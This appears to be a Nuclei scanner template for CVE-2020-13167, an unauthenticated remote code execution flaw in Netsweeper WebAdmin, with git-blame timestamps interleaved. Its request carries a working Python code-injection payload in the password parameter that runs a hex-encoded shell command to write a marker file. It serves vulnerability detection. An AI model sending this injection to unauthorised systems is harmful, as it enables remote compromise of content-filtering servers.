2021-01-02 04:56:15 +00:00
id : CVE-2020-13167
2020-07-07 19:26:15 +00:00
info :
name : Netsweeper WebAdmin unixlogin.php Python Code Injection
author : dwisiswant0
severity : critical
2020-08-25 22:52:00 +00:00
description : Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters.
2021-02-05 19:44:41 +00:00
tags : cve,cve2020,netsweeper,rce
2021-08-18 11:37:49 +00:00
reference :
2021-03-11 16:45:17 +00:00
- https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
- https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.80
cve-id : CVE-2020-13167
cwe-id : CWE-78
2021-09-16 15:54:33 +00:00
metadata :
hex-payload : 'echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out'
2020-07-07 19:26:15 +00:00
requests :
- method : GET
path :
2020-07-08 20:02:14 +00:00
- "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
- "{{BaseURL}}/webadmin/out"
2021-09-09 13:38:13 +00:00
2020-07-07 19:26:15 +00:00
headers :
2021-09-08 12:17:19 +00:00
Referer : "{{BaseURL}}/webadmin/admin/service_manager_data.php"
2020-07-07 19:26:15 +00:00
matchers-condition : and
matchers :
- type : word
words :
- "nonexistent"
part : body
2021-09-08 12:17:19 +00:00
2020-07-07 19:26:15 +00:00
- type : status
status :
2020-08-25 22:52:00 +00:00
- 200